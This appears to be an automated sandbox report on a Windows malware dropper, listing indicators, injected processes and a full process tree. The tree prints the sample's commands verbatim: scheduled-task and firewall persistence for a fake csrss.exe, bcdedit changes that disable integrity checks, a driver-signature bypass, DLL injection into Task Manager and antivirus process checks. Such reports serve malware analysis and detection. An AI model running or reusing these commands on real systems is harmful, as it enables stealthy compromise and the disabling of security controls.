ecd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1836 PING.EXE
1988 PING.EXE
2152 PING.EXE
2188 PING.EXE

pid	process
1836	PING.EXE
1988	PING.EXE
2152	PING.EXE
2188	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

iunMWhqpwqIzRC4E9zVK4PBR.exe9CTf5dAp4bNsMmI_L01a38V_.exengv6jVRLGlmucpE9o_WwkMBD.exeRespect.exe.pifVery.exe.pifL5CCUbftxW_m2YwQJsnYTAsP.exeL5CCUbftxW_m2YwQJsnYTAsP.exeAdblock.exe

pid	process
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1624	9CTf5dAp4bNsMmI_L01a38V_.exe
1624	9CTf5dAp4bNsMmI_L01a38V_.exe
552	ngv6jVRLGlmucpE9o_WwkMBD.exe
552	ngv6jVRLGlmucpE9o_WwkMBD.exe
1300
1300
1300
1300
1300
1300
1300
1300
1300
1300
1300
1300
1300
952	Respect.exe.pif
2024	Very.exe.pif
2024	Very.exe.pif
952	Respect.exe.pif
2024	Very.exe.pif
952	Respect.exe.pif
1300
1300
1300
1300
1300
1936	L5CCUbftxW_m2YwQJsnYTAsP.exe
1300
1300
1300
1300
1300
1300
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
1300
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1300
1300
1096	Adblock.exe
1300
1300
552	ngv6jVRLGlmucpE9o_WwkMBD.exe
1096	Adblock.exe
1300
1300
1096	Adblock.exe
552	ngv6jVRLGlmucpE9o_WwkMBD.exe
1300
1300
1096	Adblock.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1300
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

9CTf5dAp4bNsMmI_L01a38V_.exe

pid process

1624 9CTf5dAp4bNsMmI_L01a38V_.exe

pid	process
1300

pid	process
460

pid	process
1624	9CTf5dAp4bNsMmI_L01a38V_.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

robocopy.exefind.exemakecab.exetasklist.exetaskkill.exetaskkill.exetasklist.exetasklist.exeL5CCUbftxW_m2YwQJsnYTAsP.exengv6jVRLGlmucpE9o_WwkMBD.execsrss.exetaskkill.exesc.exe

description	pid	process
Token: SeBackupPrivilege	768	robocopy.exe
Token: SeRestorePrivilege	768	robocopy.exe
Token: SeSecurityPrivilege	768	robocopy.exe
Token: SeTakeOwnershipPrivilege	768	robocopy.exe
Token: SeBackupPrivilege	1088	find.exe
Token: SeRestorePrivilege	1088	find.exe
Token: SeSecurityPrivilege	1088	find.exe
Token: SeTakeOwnershipPrivilege	1088	find.exe
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeDebugPrivilege	1960	makecab.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1156	tasklist.exe
Token: SeDebugPrivilege	1972	tasklist.exe
Token: SeShutdownPrivilege	1300
Token: SeDebugPrivilege	1936	L5CCUbftxW_m2YwQJsnYTAsP.exe
Token: SeImpersonatePrivilege	1936	L5CCUbftxW_m2YwQJsnYTAsP.exe
Token: SeDebugPrivilege	552	ngv6jVRLGlmucpE9o_WwkMBD.exe
Token: SeSystemEnvironmentPrivilege	2448	csrss.exe
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeDebugPrivilege	468	taskkill.exe
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeShutdownPrivilege	1300
Token: SeSecurityPrivilege	2964	sc.exe
Token: SeSecurityPrivilege	2964	sc.exe

Suspicious use of FindShellTrayWindow 22 IoCs

Processes:

5ch06654oNHEAMWvsdbULnap.tmpRespect.exe.pifVery.exe.pifAdblock.exeAdblockInstaller.tmpAdblock.exe

pid	process
1832	5ch06654oNHEAMWvsdbULnap.tmp
952	Respect.exe.pif
2024	Very.exe.pif
1300
1300
1300
1300
952	Respect.exe.pif
1300
1300
2024	Very.exe.pif
952	Respect.exe.pif
2024	Very.exe.pif
1300
1300
1300
1300
1096	Adblock.exe
1300
1300
3068	AdblockInstaller.tmp
2364	Adblock.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

Respect.exe.pifVery.exe.pifAdblock.exeAdblock.exe

pid	process
952	Respect.exe.pif
2024	Very.exe.pif
952	Respect.exe.pif
2024	Very.exe.pif
952	Respect.exe.pif
2024	Very.exe.pif
1300
1300
1300
1300
1300
1300
1096	Adblock.exe
1300
1300
2364	Adblock.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Adblock.exeAdblock.exe

pid process

1096 Adblock.exe
1096 Adblock.exe
1096 Adblock.exe
1096 Adblock.exe
2364 Adblock.exe
2364 Adblock.exe
2364 Adblock.exe
2364 Adblock.exe

pid	process
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
2364	Adblock.exe
2364	Adblock.exe
2364	Adblock.exe
2364	Adblock.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2a1363e9e6d309726686ef2d319eec73.exeiunMWhqpwqIzRC4E9zVK4PBR.exeLVaY_PCj_xc6lfHy32TqvuEZ.exeqDY5aVcCU1dbUEr13IrlTIDK.exeX_om1kbHCXSTuY2xXFnbSC9I.exe

description	pid	process	target process
PID 812 wrote to memory of 1668	812	2a1363e9e6d309726686ef2d319eec73.exe	iunMWhqpwqIzRC4E9zVK4PBR.exe
PID 812 wrote to memory of 1668	812	2a1363e9e6d309726686ef2d319eec73.exe	iunMWhqpwqIzRC4E9zVK4PBR.exe
PID 812 wrote to memory of 1668	812	2a1363e9e6d309726686ef2d319eec73.exe	iunMWhqpwqIzRC4E9zVK4PBR.exe
PID 812 wrote to memory of 1668	812	2a1363e9e6d309726686ef2d319eec73.exe	iunMWhqpwqIzRC4E9zVK4PBR.exe
PID 812 wrote to memory of 1836	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 1836	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 1836	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 1836	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 588	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 588	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 588	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 812 wrote to memory of 588	812	2a1363e9e6d309726686ef2d319eec73.exe	schtasks.exe
PID 1668 wrote to memory of 956	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	9CTf5dAp4bNsMmI_L01a38V_.exe
PID 1668 wrote to memory of 956	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	9CTf5dAp4bNsMmI_L01a38V_.exe
PID 1668 wrote to memory of 956	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	9CTf5dAp4bNsMmI_L01a38V_.exe
PID 1668 wrote to memory of 956	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	9CTf5dAp4bNsMmI_L01a38V_.exe
PID 1668 wrote to memory of 1732	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	qDY5aVcCU1dbUEr13IrlTIDK.exe
PID 1668 wrote to memory of 1732	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	qDY5aVcCU1dbUEr13IrlTIDK.exe
PID 1668 wrote to memory of 1732	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	qDY5aVcCU1dbUEr13IrlTIDK.exe
PID 1668 wrote to memory of 1732	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	qDY5aVcCU1dbUEr13IrlTIDK.exe
PID 1668 wrote to memory of 1936	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	L5CCUbftxW_m2YwQJsnYTAsP.exe
PID 1668 wrote to memory of 1936	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	L5CCUbftxW_m2YwQJsnYTAsP.exe
PID 1668 wrote to memory of 1936	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	L5CCUbftxW_m2YwQJsnYTAsP.exe
PID 1668 wrote to memory of 1936	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	L5CCUbftxW_m2YwQJsnYTAsP.exe
PID 1668 wrote to memory of 1080	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	LVaY_PCj_xc6lfHy32TqvuEZ.exe
PID 1668 wrote to memory of 1080	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	LVaY_PCj_xc6lfHy32TqvuEZ.exe
PID 1668 wrote to memory of 1080	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	LVaY_PCj_xc6lfHy32TqvuEZ.exe
PID 1668 wrote to memory of 1080	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	LVaY_PCj_xc6lfHy32TqvuEZ.exe
PID 1668 wrote to memory of 1104	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	X_om1kbHCXSTuY2xXFnbSC9I.exe
PID 1668 wrote to memory of 1104	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	X_om1kbHCXSTuY2xXFnbSC9I.exe
PID 1668 wrote to memory of 1104	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	X_om1kbHCXSTuY2xXFnbSC9I.exe
PID 1668 wrote to memory of 1104	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	X_om1kbHCXSTuY2xXFnbSC9I.exe
PID 1668 wrote to memory of 552	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	ngv6jVRLGlmucpE9o_WwkMBD.exe
PID 1668 wrote to memory of 552	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	ngv6jVRLGlmucpE9o_WwkMBD.exe
PID 1668 wrote to memory of 552	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	ngv6jVRLGlmucpE9o_WwkMBD.exe
PID 1668 wrote to memory of 552	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	ngv6jVRLGlmucpE9o_WwkMBD.exe
PID 1668 wrote to memory of 1932	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	GhKDsCbn7zPS5pDBpEJ1GNxd.exe
PID 1668 wrote to memory of 1932	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	GhKDsCbn7zPS5pDBpEJ1GNxd.exe
PID 1668 wrote to memory of 1932	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	GhKDsCbn7zPS5pDBpEJ1GNxd.exe
PID 1668 wrote to memory of 1932	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	GhKDsCbn7zPS5pDBpEJ1GNxd.exe
PID 1668 wrote to memory of 868	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	c3ItUxuFaaIJd7G8cdcptY4S.exe
PID 1668 wrote to memory of 868	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	c3ItUxuFaaIJd7G8cdcptY4S.exe
PID 1668 wrote to memory of 868	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	c3ItUxuFaaIJd7G8cdcptY4S.exe
PID 1668 wrote to memory of 868	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	c3ItUxuFaaIJd7G8cdcptY4S.exe
PID 1668 wrote to memory of 580	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	xVJiXIH0FM4CqB2OEeytcXZ6.exe
PID 1668 wrote to memory of 580	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	xVJiXIH0FM4CqB2OEeytcXZ6.exe
PID 1668 wrote to memory of 580	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	xVJiXIH0FM4CqB2OEeytcXZ6.exe
PID 1668 wrote to memory of 580	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	xVJiXIH0FM4CqB2OEeytcXZ6.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1668 wrote to memory of 820	1668	iunMWhqpwqIzRC4E9zVK4PBR.exe	5ch06654oNHEAMWvsdbULnap.exe
PID 1080 wrote to memory of 768	1080	LVaY_PCj_xc6lfHy32TqvuEZ.exe	robocopy.exe
PID 1080 wrote to memory of 768	1080	LVaY_PCj_xc6lfHy32TqvuEZ.exe	robocopy.exe
PID 1080 wrote to memory of 768	1080	LVaY_PCj_xc6lfHy32TqvuEZ.exe	robocopy.exe
PID 1080 wrote to memory of 768	1080	LVaY_PCj_xc6lfHy32TqvuEZ.exe	robocopy.exe
PID 1732 wrote to memory of 1088	1732	qDY5aVcCU1dbUEr13IrlTIDK.exe	find.exe
PID 1732 wrote to memory of 1088	1732	qDY5aVcCU1dbUEr13IrlTIDK.exe	find.exe
PID 1732 wrote to memory of 1088	1732	qDY5aVcCU1dbUEr13IrlTIDK.exe	find.exe
PID 1732 wrote to memory of 1088	1732	qDY5aVcCU1dbUEr13IrlTIDK.exe	find.exe
PID 1104 wrote to memory of 1652	1104	X_om1kbHCXSTuY2xXFnbSC9I.exe	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\2a1363e9e6d309726686ef2d319eec73.exe
"C:\Users\Admin\AppData\Local\Temp\2a1363e9e6d309726686ef2d319eec73.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:812

C:\Users\Admin\Documents\iunMWhqpwqIzRC4E9zVK4PBR.exe
"C:\Users\Admin\Documents\iunMWhqpwqIzRC4E9zVK4PBR.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\Pictures\Adobe Films\9CTf5dAp4bNsMmI_L01a38V_.exe
"C:\Users\Admin\Pictures\Adobe Films\9CTf5dAp4bNsMmI_L01a38V_.exe"
3⤵
- Executes dropped EXE
PID:956

C:\Users\Admin\Pictures\Adobe Films\9CTf5dAp4bNsMmI_L01a38V_.exe
"C:\Users\Admin\Pictures\Adobe Films\9CTf5dAp4bNsMmI_L01a38V_.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1624

C:\Users\Admin\Pictures\Adobe Films\qDY5aVcCU1dbUEr13IrlTIDK.exe
"C:\Users\Admin\Pictures\Adobe Films\qDY5aVcCU1dbUEr13IrlTIDK.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\SysWOW64\robocopy.exe
robocopy /?
4⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Ton.mp3 & ping -n 5 localhost
4⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
- Loads dropped DLL
PID:1824

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
6⤵
PID:364

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^LLCBzOsjfsQ$" Exports.mp3
6⤵
PID:700

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
6⤵
- Runs ping.exe
PID:1988

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Very.exe.pif
Very.exe.pif Q
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2024

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:2152

C:\Users\Admin\Pictures\Adobe Films\L5CCUbftxW_m2YwQJsnYTAsP.exe
"C:\Users\Admin\Pictures\Adobe Films\L5CCUbftxW_m2YwQJsnYTAsP.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Users\Admin\Pictures\Adobe Films\L5CCUbftxW_m2YwQJsnYTAsP.exe
"C:\Users\Admin\Pictures\Adobe Films\L5CCUbftxW_m2YwQJsnYTAsP.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:2320

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2352

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2784

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2808

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2860

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
7⤵
- Modifies boot configuration data using bcdedit
PID:2952

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:3004

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:3012

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
7⤵
- Modifies boot configuration data using bcdedit
PID:3060

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:1464

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:340

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
7⤵
- Modifies boot configuration data using bcdedit
PID:2516

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
7⤵
- Modifies boot configuration data using bcdedit
PID:2092

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
7⤵
- Modifies boot configuration data using bcdedit
PID:2716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
7⤵
- Modifies boot configuration data using bcdedit
PID:1980

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
7⤵
- Modifies boot configuration data using bcdedit
PID:2264

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
7⤵
- Modifies boot configuration data using bcdedit
PID:2760

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
7⤵
- Modifies boot configuration data using bcdedit
PID:2132

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:3016

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
6⤵
- Modifies boot configuration data using bcdedit
PID:956

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
6⤵
- Executes dropped EXE
PID:2116

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:2076

C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Users\Admin\Pictures\Adobe Films\X_om1kbHCXSTuY2xXFnbSC9I.exe
"C:\Users\Admin\Pictures\Adobe Films\X_om1kbHCXSTuY2xXFnbSC9I.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -Y .\GbM~1PV.Qm
4⤵
PID:1652

C:\Users\Admin\Pictures\Adobe Films\LVaY_PCj_xc6lfHy32TqvuEZ.exe
"C:\Users\Admin\Pictures\Adobe Films\LVaY_PCj_xc6lfHy32TqvuEZ.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\robocopy.exe
robocopy /?
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Organisations.jpg & ping -n 5 localhost
4⤵
PID:544

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
- Loads dropped DLL
PID:836

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
6⤵
- Enumerates processes with tasklist
PID:1960

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
6⤵
PID:1672

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
6⤵
PID:1704

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^rCLEJGCiZAx$" Member.jpg
6⤵
PID:1700

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Respect.exe.pif
Respect.exe.pif z
6⤵
- Executes dropped EXE
